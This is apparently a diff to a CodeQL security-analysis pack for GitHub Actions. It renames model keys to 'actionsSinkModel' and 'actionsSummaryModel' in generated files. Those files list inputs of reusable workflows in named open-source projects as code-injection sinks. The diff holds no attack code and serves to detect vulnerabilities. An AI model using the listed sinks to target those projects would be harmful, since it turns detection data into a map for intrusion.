diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51691edc1f97..c3ff42ed6049 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 3a14f6a879d5..964436f33ca8 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index c7f84e83db5a..995940550e19 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 72383be71ca2..93653f07819e 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 8b05adf053ea..961070778cfd 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9eec959ade3a..9f1cc82523cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 835301ecc73a..68babc09b6a1 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 9a99588239ee..f4271e5424b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 12c370b33ada..f20f7997d3c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 0e03216fc698..da5617fd144d 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 081378c96179..78821b4dad3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index fcd9c2929013..f0c9290ca22e 100644 
--- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 19822c29fcda..21d236989316 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index d0ccde698b1a..ac38cac602d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 027da83e922d..a9f87db955ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index a914aa631c3d..99c706b0c28b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index d0fe6b0eff5a..f8d0172d684b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 3d3a4de2946a..5afda471f8b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4c58af6969dc..4e5ca50ccec1 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 8629f279891a..02801615bd51 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 4a6bbd77ec97..d808d612857f 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index c22998ee52a4..e543dc8b7f34 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index c74922e61dc0..891d902f4709 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index c9c7e8318f7e..334d64dfbece 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 169094c3eb38..2c600cd7f7d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 6e4e4f4f1e90..cc6c4e620e60 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index dbc26ef9f04f..efbf050ddc96 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index c69de7cfcc26..9860bd3ab92f 100644 
--- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 685b0b144c9d..c160c29f6f63 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 9e3fc5cdc4f8..910715eece07 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] 
@@ -16,7 +16,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4cd6cd8f591a..f04e67670d3b 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 01726410e185..3d5fa057987c 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml 
@@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 90e61bcf11a0..31d0e691e7f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index b4e1ff8155a3..5f9da314f90b 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 3621105b74e1..7ae494adb2b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index b6660df1c9b2..dce969719d29 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index ead0bcfab169..cd5d5ff7d0fd 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 6f9a12e90698..fd17e601d805 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 8ac32e4a7b7f..bed40dce4298 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 3c21fcad386c..62a12e471389 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index e0d2508932fe..7491c4f951af 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 96830183506a..1876f1146cbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 7f9299eb4d39..4a8534429f90 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml 